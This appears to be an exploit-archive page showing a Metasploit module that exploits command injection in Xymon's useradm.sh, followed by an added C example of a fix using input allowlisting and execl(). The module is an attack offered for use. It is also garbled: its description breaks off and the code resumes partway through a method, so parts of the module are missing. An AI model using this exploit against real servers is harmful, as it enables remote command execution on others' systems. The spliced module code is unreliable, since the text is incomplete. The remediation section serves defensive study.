Exploit / Vulnerability Discovered: 2019-07-12
Type: remote
Platform: multiple
This exploit / vulnerability, Xymon 4.3.25 useradm command execution (metasploit), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Xymon useradm Command Execution',
      'Description' => %q{
        This module exploits a command injection vulnerability in Xymon
        versions before 4.3.25 which allows authenticated users
        to execute arbitrary operating system commands as the web
        server user.

        When adding a new user to the system via the web interface with
        `useradm.sh`, the user's username and password are passed to
        `htpasswd` in a call to `system()` without validation.

    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end

    if res.code == 401
      fail_with(Failure::NoAccess, 'Authentication failed')
    end

    unless res.code == 500
      fail_with(Failure::Unknown, 'Unexpected reply')
    end

    print_good "#{peer} - Payload sent successfully"

    res
  end

  def exploit
    unless [Exploit::CheckCode::Detected, Exploit::CheckCode::Appears].include?(check)
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    if payload.arch.first == 'cmd'
      execute_command(payload.encoded)
    else
      execute_cmdstager(linemax: 1_500)
    end
  end
end
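
The module description attributes the bug to the username and password reaching `htpasswd` through `system()` without validation. The C code below is an added example, not Xymon's source and not part of the module: it shows one way to close that path by allowlisting the username and running `htpasswd -i` through `execl()` with the password on stdin. The function names are hypothetical, and `bin` and `file` are assumed to be fixed server-side paths.

```c
#include <signal.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Added example with hypothetical names; not Xymon source code.
 * Shape of the flaw: snprintf(cmd, ..., "htpasswd ... %s %s", user, pass);
 * system(cmd);  -> /bin/sh parses the form fields as shell syntax. */

/* Username allowlist: 1-32 chars of [A-Za-z0-9._-], no leading '-'
 * (so htpasswd cannot read it as an option). */
int valid_username(const char *u)
{
    static const char ok[] = "abcdefghijklmnopqrstuvwxyz"
                             "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-";
    size_t n = strlen(u);
    return n >= 1 && n <= 32 && u[0] != '-' && strspn(u, ok) == n;
}

/* The password is sent on stdin (htpasswd -i), never through a shell or
 * argv, so only line breaks, which would end the input early, are refused. */
int valid_password(const char *p)
{
    return p[0] != '\0' && strpbrk(p, "\r\n") == NULL;
}

/* Runs htpasswd with execl() (no shell). Returns its exit status, or -1
 * if the input was rejected or the process could not be run. */
int add_user(const char *bin, const char *file, const char *user, const char *pass)
{
    int fds[2], status;
    pid_t pid; ssize_t w;
    if (!valid_username(user) || !valid_password(pass)) return -1;
    if (pipe(fds) != 0) return -1;
    if ((pid = fork()) < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {                          /* child: stdin <- pipe */
        dup2(fds[0], STDIN_FILENO);
        close(fds[0]); close(fds[1]);
        execl(bin, "htpasswd", "-i", file, user, (char *)NULL);
        _exit(127);                          /* exec failed */
    }
    close(fds[0]);
    signal(SIGPIPE, SIG_IGN);                /* child may exit before reading */
    w = write(fds[1], pass, strlen(pass));
    if (w >= 0) w = write(fds[1], "\n", 1);
    close(fds[1]);
    if (waitpid(pid, &status, 0) < 0) return -1;
    return (w >= 0 && WIFEXITED(status)) ? WEXITSTATUS(status) : -1;
}
```

Because no shell ever parses the fields, shell metacharacters in the password are stored as literal characters, while the username is still restricted so it cannot act as an `htpasswd` option.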